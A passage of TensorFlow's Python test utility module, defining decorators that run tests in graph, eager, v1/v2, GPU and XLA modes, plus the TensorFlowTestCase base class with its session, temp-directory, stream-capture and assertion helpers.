[("testcase_name", "_test{}".format(name))]))
return named_combinations
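# Continuing the hedged example above, each combination also gains a generated
# "testcase_name" built from the alphanumeric characters of its keys and
# values, e.g. ("testcase_name", "_test_mode_graph_usegpu_True") for the
# first entry.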
def run_all_in_graph_and_eager_modes(cls):
"""Execute all test methods in the given class with and without eager."""
base_decorator = run_in_graph_and_eager_modes
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name.startswith("testSkipEager") or
name.startswith("test_skip_eager") or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def build_as_function_and_v1_graph(func=None):
"""Run a test case in v1 graph mode and inside tf.function in eager mode.
WARNING: This decorator can only be used in test cases that statically check
the generated graph. Attempting to evaluate graph or function results via
session.run() or self.evaluate() will fail.
WARNING: This decorator can only be used for test cases that inherit from
absl.testing.parameterized.TestCase.
Args:
func: Test case function to be decorated.
Returns:
Decorated test case function.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_mode_and_function` only supports test methods.")
@parameterized.named_parameters(("_v1_graph", "v1_graph"),
("_function", "function"))
@functools.wraps(f)
def decorated(self, run_mode, *args, **kwargs):
if run_mode == "v1_graph":
with ops.Graph().as_default():
f(self, *args, **kwargs)
elif run_mode == "function":
@def_function.function
def function_in_eager():
f(self, *args, **kwargs)
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
function_in_eager()
ops.dismantle_graph(graph_for_eager_test)
else:
return ValueError("Unknown run mode %s" % run_mode)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_in_async_and_sync_mode(f):
"""Execute the test in async mode and sync mode."""
@parameterized.named_parameters([("Async", True), ("", False)])
@functools.wraps(f)
def decorator(self, async_mode, *args, **kwargs):
if async_mode:
with context.execution_mode(context.ASYNC):
f(self, *args, **kwargs)
else:
with context.execution_mode(context.SYNC):
f(self, *args, **kwargs)
return decorator
def eager_lazy_remote_copy_on_and_off(f):
"""Execute the test method w/o lazy tensor copy for function remote inputs."""
@parameterized.named_parameters([("WithLazyRemoteCopy", True), ("", False)])
@functools.wraps(f)
def decorator(self, lazily_remote_copy, *args, **kwargs):
if lazily_remote_copy:
context.context().lazy_remote_inputs_copy = True
else:
context.context().lazy_remote_inputs_copy = False
f(self, *args, **kwargs)
return decorator
def run_in_graph_and_eager_modes(func=None,
config=None,
use_gpu=True,
reset_test=True,
assert_no_eager_garbage=False):
"""Execute the decorated test with and without enabling eager execution.
This function returns a decorator intended to be applied to test methods in
a `tf.test.TestCase` class. Doing so will cause the contents of the test
method to be executed twice - once normally, and once with eager execution
enabled. This allows unittests to confirm the equivalence between eager
and graph execution (see `tf.compat.v1.enable_eager_execution`).
For example, consider the following unittest:
```python
class MyTests(tf.test.TestCase):
@run_in_graph_and_eager_modes
def test_foo(self):
x = tf.constant([1, 2])
y = tf.constant([3, 4])
z = tf.add(x, y)
self.assertAllEqual([4, 6], self.evaluate(z))
if __name__ == "__main__":
tf.test.main()
```
This test validates that `tf.add()` has the same behavior when computed with
eager execution enabled as it does when constructing a TensorFlow graph and
executing the `z` tensor in a session.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
Args:
func: function to be annotated. If `func` is None, this method returns a
decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
config: An optional config_pb2.ConfigProto to use to configure the session
when executing graphs.
use_gpu: If True, attempt to run as many operations as possible on GPU.
reset_test: If True, tearDown and SetUp the test case between the two
executions of the test (once with and once without eager execution).
assert_no_eager_garbage: If True, sets DEBUG_SAVEALL on the garbage
collector and asserts that no extra garbage has been created when running
the test with eager execution enabled. This will fail if there are
reference cycles (e.g. a = []; a.append(a)). Off by default because some
tests may create garbage for legitimate reasons (e.g. they define a class
which inherits from `object`), and because DEBUG_SAVEALL is sticky in some
Python interpreters (meaning that tests which rely on objects being
collected elsewhere in the unit test file will not work). Additionally,
checks that nothing still has a reference to Tensors that the test
allocated.
Returns:
Returns a decorator that will run the decorated test method twice:
once by constructing and executing a graph in a session and once with
eager execution enabled.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError(
"`run_in_graph_and_eager_modes` only supports test methods. "
"Did you mean to use `run_all_in_graph_and_eager_modes`?")
def decorated(self, *args, **kwargs):
try:
with context.graph_mode():
with self.test_session(use_gpu=use_gpu, config=config):
f(self, *args, **kwargs)
except unittest.case.SkipTest:
pass
def run_eagerly(self, **kwargs):
if not use_gpu:
with ops.device("/device:CPU:0"):
f(self, *args, **kwargs)
else:
f(self, *args, **kwargs)
if assert_no_eager_garbage:
ops.reset_default_graph()
run_eagerly = assert_no_new_tensors(
assert_no_garbage_created(run_eagerly))
if reset_test:
# This decorator runs the wrapped test twice.
# Reset the test environment between runs.
self.tearDown()
self._tempdir = None
# Create a new graph for the eagerly executed version of this test for
# better isolation.
graph_for_eager_test = ops.Graph()
with graph_for_eager_test.as_default(), context.eager_mode():
if reset_test:
self.setUp()
run_eagerly(self, **kwargs)
ops.dismantle_graph(graph_for_eager_test)
return tf_decorator.make_decorator(f, decorated)
if func is not None:
return decorator(func)
return decorator
def py_func_if_in_function(f):
def decorated(*args, **kwds):
if not ops.inside_function():
return f(*args, **kwds)
tensor_args = []
tensor_indices = []
for i, arg in enumerate(args):
if isinstance(arg, (ops.Tensor, variables.Variable)):
tensor_args.append(arg)
tensor_indices.append(i)
def inner_f(*inner_tensor_args):
my_args = list(args)
for i, n in zip(tensor_indices, inner_tensor_args):
my_args[i] = n
return f(*my_args, **kwds)
return script_ops.py_func(inner_f, tensor_args, [])
return tf_decorator.make_decorator(f, decorated)
def also_run_as_tf_function(f):
"""Runs the decorated test twice--once as is, once inside a tf.function.
This allows you to run a test both in eager execution and inside a
tf.function, exercising the two execution modes supported in tf 2.0. The test
assertions are automatically done inside tf.py_funcs, and tf.function ensures
that they run in the proper order and with the proper side effects.
Currently variable creation is not supported in tests annotated with this
decorator since it's tricky to ensure the variable doesn't get repeatedly
created when retracing the tf.function.
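  A usage sketch (the test method and the `constant_op` import are illustrative
  assumptions):
  ```python
  class SquareTest(test_util.TensorFlowTestCase):
    @test_util.also_run_as_tf_function
    def test_square(self):
      x = constant_op.constant(3.0)
      # Runs once eagerly and once wrapped in a tf.function; on the second
      # pass the assertion executes inside a tf.py_func.
      self.assertAllClose(x * x, 9.0)
  ```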
Args:
f: the test method to be decorated
Returns:
The decorated test method, which will run both in eager and inside a
tf.function.
"""
def decorated(*args, **kwds):
def bound_f():
f(*args, **kwds)
with context.eager_mode():
# Running in eager mode
bound_f()
# Running as TF function
# TODO(b/121143941): Remove the autograph override.
def_function.function(bound_f, autograph=False)()
return decorated
def deprecated_graph_mode_only(func=None):
"""Execute the decorated test in graph mode.
This function returns a decorator intended to be applied to tests that are not
compatible with eager mode. When this decorator is applied, the test body will
be run in an environment where API calls construct graphs instead of executing
eagerly.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
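  A usage sketch (the test class and method are illustrative assumptions):
  ```python
  class GraphOnlyTest(test_util.TensorFlowTestCase):
    @test_util.deprecated_graph_mode_only
    def test_graph_construction(self):
      # API calls in this body build graph nodes instead of executing eagerly,
      # so v1-style sessions, placeholders and feed dicts keep working.
      with self.cached_session() as sess:
        ...
  ```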
Args:
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will run the decorated test method in graph mode.
"""
def decorator(f):
if tf_inspect.isclass(f):
setup = f.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
for name, value in f.__dict__.copy().items():
if (callable(value) and
name.startswith(unittest.TestLoader.testMethodPrefix)):
setattr(f, name, decorator(value))
return f
def decorated(self, *args, **kwargs):
if context.executing_eagerly():
with context.graph_mode():
return f(self, *args, **kwargs)
else:
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
run_deprecated_v1 = deprecated_graph_mode_only
def run_all_in_deprecated_graph_mode_only(cls):
"""Execute all tests in a class in graph mode."""
base_decorator = deprecated_graph_mode_only
for name in dir(cls):
if (not name.startswith(unittest.TestLoader.testMethodPrefix) or
name == "test_session"):
continue
value = getattr(cls, name, None)
if callable(value):
setattr(cls, name, base_decorator(value))
return cls
def run_v1_only(reason, func=None):
"""Execute the decorated test only if running in v1 mode.
This function is intended to be applied to tests that exercise v1 only
functionality. If the test is run in v2 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
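  A usage sketch (the reason string and test method are illustrative
  assumptions):
  ```python
  class SessionOnlyTest(test_util.TensorFlowTestCase):
    @test_util.run_v1_only("Relies on tf.compat.v1 Session semantics.")
    def test_session_run(self):
      ...  # Skipped automatically when TF 2.x behavior is enabled.
  ```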
Args:
reason: string giving a reason for limiting the test to v1 only.
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
if not isinstance(reason, str):
raise ValueError("'reason' should be string, got {}".format(type(reason)))
def decorator(f):
if tf_inspect.isclass(f):
# To skip an entire test suite class, we only decorate the setUp method
# to skip all tests. There are cases when setUp is not defined (not
# overridden in subclasses of TestCase, so not available in f.__dict__
# below). For those cases, we walk the method resolution order list and
# pick the first setUp method we find (usually this should be the one in
# the parent class since that's the TestCase class).
for cls in type.mro(f):
setup = cls.__dict__.get("setUp")
if setup is not None:
setattr(f, "setUp", decorator(setup))
break
return f
else:
# If f is just a function, just create a decorator for it and return it
def decorated(self, *args, **kwargs):
if tf2.enabled():
self.skipTest(reason)
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_v2_only(func=None):
"""Execute the decorated test only if running in v2 mode.
This function is intended to be applied to tests that exercise v2 only
functionality. If the test is run in v1 mode it will simply be skipped.
`deprecated_graph_mode_only`, `run_v1_only`, `run_v2_only`, and
`run_in_graph_and_eager_modes` are available decorators for different
v1/v2/eager/graph combinations.
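  A usage sketch (the test method is an illustrative assumption):
  ```python
  class FunctionTest(test_util.TensorFlowTestCase):
    @test_util.run_v2_only
    def test_eager_behavior(self):
      ...  # Skipped automatically when TF 2.x behavior is not enabled.
  ```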
Args:
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_v2_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not tf2.enabled():
self.skipTest("Test is only compatible with v2")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_gpu_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a GPU. If a GPU is absent, it will simply be skipped.
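  A usage sketch (the test method is an illustrative assumption):
  ```python
  class GpuKernelTest(test_util.TensorFlowTestCase):
    @test_util.run_gpu_only
    def test_gpu_kernel(self):
      ...  # Only reached when is_gpu_available() is True; otherwise skipped.
  ```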
Args:
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_gpu_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available():
self.skipTest("Test requires GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def run_cuda_only(func=None):
"""Execute the decorated test only if a GPU is available.
This function is intended to be applied to tests that require the presence
of a CUDA GPU. If a CUDA GPU is absent, it will simply be skipped.
Args:
func: function to be annotated. If `func` is None, this method returns a
      decorator that can be applied to a function. If `func` is not None this
returns the decorator applied to `func`.
Returns:
Returns a decorator that will conditionally skip the decorated test method.
"""
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`run_cuda_only` only supports test methods.")
def decorated(self, *args, **kwargs):
if not is_gpu_available(cuda_only=True):
self.skipTest("Test requires CUDA GPU")
return f(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
def with_forward_compatibility_horizons(*horizons):
"""Executes the decorated test with the specified forward-compat horizons.
Args:
*horizons: A list of (year, month, day) tuples. If the list includes
`None`, then the test will also be run with no forward-compatibility
horizon set.
Returns:
A decorator that will execute the test with the specified horizons.
"""
if not horizons:
raise ValueError("Expected at least one horizon.")
for horizon in horizons:
if not ((horizon is None) or
(len(horizon) == 3 and all(isinstance(x, int) for x in horizon))):
raise ValueError("Bad horizon value: %r" % horizon)
def decorator(f):
if tf_inspect.isclass(f):
raise ValueError("`with_forward_compatibility_horizons` only "
"supports test methods.")
def decorated(self, *args, **kwargs):
for horizon in horizons:
if horizon is None:
f(self, *args, **kwargs)
else:
(year, month, day) = horizon
with forward_compatibility_horizon(year, month, day):
f(self, *args, **kwargs)
return decorated
return decorator
@deprecation.deprecated(None,
"Use `tf.config.list_physical_devices('GPU')` instead.")
@tf_export("test.is_gpu_available")
def is_gpu_available(cuda_only=False, min_cuda_compute_capability=None):
"""Returns whether TensorFlow can access a GPU.
  Warning: if a non-GPU version of the package is installed, the function will
  also return False. Use `tf.test.is_built_with_cuda` to validate if TensorFlow
  was built with CUDA support.
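  For example, a test might guard GPU-specific assertions as sketched below
  (the compute-capability value is an illustrative choice):
  ```python
  if not tf.test.is_gpu_available(cuda_only=True,
                                  min_cuda_compute_capability=(7, 0)):
    self.skipTest("Requires a CUDA GPU with compute capability >= 7.0")
  ```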
Args:
cuda_only: limit the search to CUDA GPUs.
min_cuda_compute_capability: a (major,minor) pair that indicates the minimum
CUDA compute capability required, or None if no requirement.
  Note that the keyword arg name "cuda_only" is misleading: the routine will
  return true when a GPU device is available, irrespective of whether TF was
  built with CUDA support or ROCm support. However, no changes are made here
  because
  ++ Changing the name "cuda_only" to something more generic would break
  backward compatibility
  ++ Adding an equivalent "rocm_only" would require the implementation to check
  the build type. This in turn would require doing the same for CUDA and thus
  potentially break backward compatibility
  ++ Adding a new "cuda_or_rocm_only" would not break backward compatibility,
  but would require most (if not all) callers to update the call to use
  "cuda_or_rocm_only" instead of "cuda_only"
Returns:
True if a GPU device of the requested kind is available.
"""
try:
for local_device in device_lib.list_local_devices():
if local_device.device_type == "GPU":
gpu_info = gpu_util.compute_capability_from_device_desc(local_device)
cc = gpu_info.compute_capability or (0, 0)
if not min_cuda_compute_capability or cc >= min_cuda_compute_capability:
return True
if local_device.device_type == "SYCL" and not cuda_only:
return True
return False
except errors_impl.NotFoundError as e:
if not all(x in str(e) for x in ["CUDA", "not find"]):
raise e
else:
logging.error(str(e))
return False
@contextlib.contextmanager
def device(use_gpu):
"""Uses gpu when requested and available."""
if use_gpu and is_gpu_available():
dev = "/device:GPU:0"
else:
dev = "/device:CPU:0"
with ops.device(dev):
yield
@contextlib.contextmanager
def use_gpu():
"""Uses gpu when requested and available."""
with device(use_gpu=True):
yield
@contextlib.contextmanager
def force_gpu():
"""Force the gpu to be used."""
with ops.device("/device:GPU:0"):
yield
@contextlib.contextmanager
def force_cpu():
"""Force the cpu to be used."""
with ops.device("/device:CPU:0"):
yield
class CapturedWrites(object):
"""A utility class to load the captured writes made to a stream."""
def __init__(self, capture_location):
self.capture_location = capture_location
def contents(self):
"""Get the captured writes as a single string."""
with open(self.capture_location) as tmp_file:
output_data = "".join(tmp_file.readlines())
return output_data
class FakeEagerSession(object):
"""Fake session so tests that conditionally use placeholders can use eager.
There are a number of tests that conditionally use placeholders for shape
inference. The pattern is demonstrated here:
```python
with self.cached_session() as sess:
if static_shape:
y = math_ops.matmul(x, ...)
feed_dict = {}
else:
x_ph = array_ops.placeholder(...)
y = math_ops.matmul(x_ph, ...)
feed_dict = {x_ph: x}
val = sess.run(y, feed_dict=feed_dict)
```
  Since the feed_dict is empty when not using placeholders, we should be able
  to call self.evaluate(); however, this requires rewriting the test case.
This class should be considered a stop-gap solution to get tests running with
eager with minimal changes to the actual test.
"""
def __init__(self, test_case):
self._test_case = test_case
def run(self, fetches, *args, **kwargs):
"""Evaluate `fetches`.
Fail if additional args are specified.
Args:
fetches: A Tensor or a nested list/tuple of Tensors.
*args: Positional arguments
**kwargs: Keyword arguments
Raises:
RuntimeError: If args or kwargs are specified.
Returns:
Tensors as numpy values.
"""
feed_dict = kwargs.pop("feed_dict", {})
if feed_dict:
raise RuntimeError(
"feed_dict is not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
if args or kwargs:
raise RuntimeError(
"Optional args are not supported when eager execution is enabled "
"(in this case, sess.run(t) is shorthand for t.numpy()")
return self._test_case.evaluate(fetches)
class ErrorLoggingSession(session.Session):
"""Wrapper around a Session that logs errors in run()."""
def run(self, *args, **kwargs):
try:
return super(ErrorLoggingSession, self).run(*args, **kwargs)
except Exception as e: # pylint: disable=broad-except
      # Note: disable the logging for OutOfRangeError, since logging it makes
      # the output of tf.data tests hard to read (OutOfRangeError is the normal
      # signal that a dataset has been exhausted).
if not isinstance(e, errors.OutOfRangeError):
logging.error(str(e))
raise
def disable_cudnn_autotune(func):
"""Disable autotuning during the call to this function.
Some tests want to base assertions on a graph being isomorphic with a copy.
To ensure this, this decorator disables autotuning.
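  A usage sketch (the test method is an illustrative assumption):
  ```python
  class ConvDeterminismTest(test_util.TensorFlowTestCase):
    @test_util.disable_cudnn_autotune
    def test_conv_graph_is_stable(self):
      ...  # Runs with TF_CUDNN_USE_AUTOTUNE=false and XLA autotuning disabled.
  ```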
Args:
func: Function to run with CuDNN autotuning turned off.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_tf_cudnn_use_autotune = os.environ.get("TF_CUDNN_USE_AUTOTUNE")
os.environ["TF_CUDNN_USE_AUTOTUNE"] = "false"
original_xla_flags = os.environ.get("XLA_FLAGS")
new_xla_flags = "--xla_gpu_autotune_level=0"
if original_xla_flags:
new_xla_flags = original_xla_flags + " " + new_xla_flags
os.environ["XLA_FLAGS"] = new_xla_flags
result = f(self, *args, **kwargs)
if (original_tf_cudnn_use_autotune is None):
del os.environ["TF_CUDNN_USE_AUTOTUNE"]
else:
os.environ["TF_CUDNN_USE_AUTOTUNE"] = original_tf_cudnn_use_autotune
if (original_xla_flags is None):
del os.environ["XLA_FLAGS"]
else:
os.environ["XLA_FLAGS"] = original_xla_flags
return result
return decorated
if func is not None:
return decorator(func)
return decorator
# The description is just for documentation purposes.
def enable_tf_xla_constant_folding(description):
if not isinstance(description, str):
raise ValueError("'description' should be string, got {}".format(
type(description)))
def enable_tf_xla_constant_folding_impl(func):
"""Enable constant folding during the call to this function.
Some tests fail without constant folding.
Args:
func: Function to run with constant folding turned on.
Returns:
Decorated function.
"""
def decorator(f):
def decorated(self, *args, **kwargs):
original_var = pywrap_tf_session.TF_GetXlaConstantFoldingDisabled()
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(False)
result = f(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(original_var)
return result
return decorated
if func is not None:
return decorator(func)
return decorator
return enable_tf_xla_constant_folding_impl
# The description is just for documentation purposes.
def disable_xla(description):
def disable_xla_impl(func):
"""Execute the test method only if xla is not enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return disable_xla_impl
def for_all_test_methods(decorator, *args, **kwargs):
"""Generate class-level decorator from given method-level decorator.
It is expected for the given decorator to take some arguments and return
a method that is then called on the test method to produce a decorated
method.
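  A usage sketch (the class and the choice of `disable_xla` as the method-level
  decorator are illustrative assumptions):
  ```python
  @test_util.for_all_test_methods(test_util.disable_xla,
                                  "These kernels have no XLA lowering.")
  class MyKernelTest(test_util.TensorFlowTestCase):
    def test_forward(self):
      ...
  ```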
Args:
decorator: The decorator to apply.
*args: Positional arguments
**kwargs: Keyword arguments
Returns: Function that will decorate a given classes test methods with the
decorator.
"""
def all_test_methods_impl(cls):
"""Apply decorator to all test methods in class."""
for name in dir(cls):
value = getattr(cls, name)
if callable(value) and name.startswith(
"test") and (name != "test_session"):
setattr(cls, name, decorator(*args, **kwargs)(value))
return cls
return all_test_methods_impl
# The description is just for documentation purposes.
def no_xla_auto_jit(description): # pylint: disable=unused-argument
def no_xla_auto_jit_impl(func):
"""This test is not intended to be run with XLA auto jit enabled."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Skip test if using XLA is forced.
return
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return no_xla_auto_jit_impl
# The description is just for documentation purposes.
def xla_allow_fallback(description): # pylint: disable=unused-argument
def xla_allow_fallback_impl(func):
"""Allow fallback to TF even though testing xla."""
def decorator(func):
def decorated(self, *args, **kwargs):
if is_xla_enabled():
# Update the global XLABuildOpsPassFlags to enable lazy compilation,
# which allows the compiler to fall back to TF classic. Remember the
# old value so that we can reset it.
old_value = pywrap_tf_session.TF_SetXlaEnableLazyCompilation(True)
result = func(self, *args, **kwargs)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(old_value)
return result
else:
return func(self, *args, **kwargs)
return decorated
if func is not None:
return decorator(func)
return decorator
return xla_allow_fallback_impl
class EagerSessionWarner(object):
def __getattr__(self, attr):
raise AttributeError(
"Trying to access properties or call methods on the result of "
"self.session(), self.cached_session(), etc while eager execution "
"is enabled. If you're porting this test case to TF 2.0, either "
"adapt the test to work with eager execution or insert a call to "
"tf.disable_eager_execution() in the main() function of this test "
"file.")
@tf_export("test.TestCase")
class TensorFlowTestCase(googletest.TestCase):
"""Base class for tests that need to test TensorFlow."""
def __init__(self, methodName="runTest"): # pylint: disable=invalid-name
super(TensorFlowTestCase, self).__init__(methodName)
if is_xla_enabled():
pywrap_tf_session.TF_SetXlaAutoJitMode("2")
pywrap_tf_session.TF_SetXlaMinClusterSize(1)
pywrap_tf_session.TF_SetXlaEnableLazyCompilation(False)
pywrap_tf_session.TF_SetTfXlaCpuGlobalJit(True)
# Constant folding secretly runs code on TF:Classic CPU, so we also
# disable it here.
pywrap_tf_session.TF_SetXlaConstantFoldingDisabled(True)
self._threads = []
self._tempdir = None
self._cached_session = None
def setUp(self):
self._ClearCachedSession()
random.seed(random_seed.DEFAULT_GRAPH_SEED)
np.random.seed(random_seed.DEFAULT_GRAPH_SEED)
# Note: The following line is necessary because some test methods may error
# out from within nested graph contexts (e.g., via assertRaises and
# assertRaisesRegexp), which may leave ops._default_graph_stack non-empty
# under certain versions of Python. That would cause
# ops.reset_default_graph() to throw an exception if the stack were not
# cleared first.
ops._default_graph_stack.reset() # pylint: disable=protected-access
ops.reset_default_graph()
random_seed.set_random_seed(random_seed.DEFAULT_GRAPH_SEED)
# Reset summary writer in case another test used set_as_default() with their
# summary writer.
summary_state = summary_ops_v2._summary_state # pylint: disable=protected-access
summary_state.writer = None
# Avoiding calling setUp() for the poorly named test_session method.
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def tearDown(self):
for thread in self._threads:
thread.check_termination()
self._ClearCachedSession()
def _ClearCachedSession(self):
if self._cached_session is not None:
self._cached_session.close()
self._cached_session = None
def get_temp_dir(self):
"""Returns a unique temporary directory for the test to use.
    If you call this method multiple times in a test, it will return the
    same folder. However, across different runs the directories will be
    different. This ensures that tests run at different times cannot pollute
    each other's environment.
If you need multiple unique directories within a single test, you should
use tempfile.mkdtemp as follows:
tempfile.mkdtemp(dir=self.get_temp_dir()):
Returns:
string, the path to the unique temporary directory created for this test.
"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
@contextlib.contextmanager
def captureWritesToStream(self, stream):
"""A context manager that captures the writes to a given stream.
This context manager captures all writes to a given stream inside of a
`CapturedWrites` object. When this context manager is created, it yields
the `CapturedWrites` object. The captured contents can be accessed by
calling `.contents()` on the `CapturedWrites`.
For this function to work, the stream must have a file descriptor that
can be modified using `os.dup` and `os.dup2`, and the stream must support
a `.flush()` method. The default python sys.stdout and sys.stderr are
examples of this. Note that this does not work in Colab or Jupyter
notebooks, because those use alternate stdout streams.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
input = [1.0, 2.0, 3.0, 4.0, 5.0]
with self.captureWritesToStream(sys.stdout) as captured:
result = MyOperator(input).eval()
self.assertStartsWith(captured.contents(), "This was printed.")
```
Args:
stream: The stream whose writes should be captured. This stream must have
a file descriptor, support writing via using that file descriptor, and
must have a `.flush()` method.
Yields:
A `CapturedWrites` object that contains all writes to the specified stream
made during this context.
"""
stream.flush()
fd = stream.fileno()
tmp_file_path = tempfile.mktemp(dir=self.get_temp_dir())
tmp_file = open(tmp_file_path, "w")
orig_fd = os.dup(fd)
os.dup2(tmp_file.fileno(), fd)
try:
yield CapturedWrites(tmp_file_path)
finally:
tmp_file.close()
os.dup2(orig_fd, fd)
def _AssertProtoEquals(self, a, b, msg=None):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
    for floating point attributes, and then uses assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
msg: Optional message to report on failure.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True, msg=msg)
def assertProtoEquals(self, expected_message_maybe_ascii, message, msg=None):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
msg: Optional message to report on failure.
"""
msg = msg if msg else ""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
      self._AssertProtoEquals(expected_message, message, msg=msg)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(
expected_message_maybe_ascii,
expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message, msg=msg)
else:
assert False, ("Can't compare protos of type %s and %s. %s" %
(type(expected_message_maybe_ascii), type(message), msg))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER,
msg=None):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual, msg=msg)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif callable(tensor):
return self._eval_helper(tensor())
else:
try:
if sparse_tensor.is_sparse(tensor):
return sparse_tensor.SparseTensorValue(tensor.indices.numpy(),
tensor.values.numpy(),
tensor.dense_shape.numpy())
elif ragged_tensor.is_ragged(tensor):
return ragged_tensor_value.RaggedTensorValue(
self._eval_tensor(tensor.values),
self._eval_tensor(tensor.row_splits))
elif isinstance(tensor, ops.IndexedSlices):
return ops.IndexedSlicesValue(
values=tensor.values.numpy(),
indices=tensor.indices.numpy(),
dense_shape=tensor.dense_shape.numpy())
return tensor.numpy()
except AttributeError as e:
six.raise_from(ValueError("Unsupported type %s." % type(tensor)), e)
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.executing_eagerly():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def session(self, graph=None, config=None, use_gpu=False, force_gpu=False):
"""A context manager for a TensorFlow Session for use in executing tests.
Note that this will set this session and the graph as global defaults.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if
`use_gpu` is True, TensorFlow tries to run as many ops on the GPU as
    possible. If both `force_gpu` and `use_gpu` are False, all ops are pinned to
the CPU.
Example:
``` python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
          self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Yields:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if context.executing_eagerly():
yield EagerSessionWarner()
else:
with self._create_session(graph, config, force_gpu) as sess:
with self._constrain_devices_and_set_default(sess, use_gpu, force_gpu):
yield sess
@contextlib.contextmanager
def cached_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method behaves differently than self.session(): for performance reasons
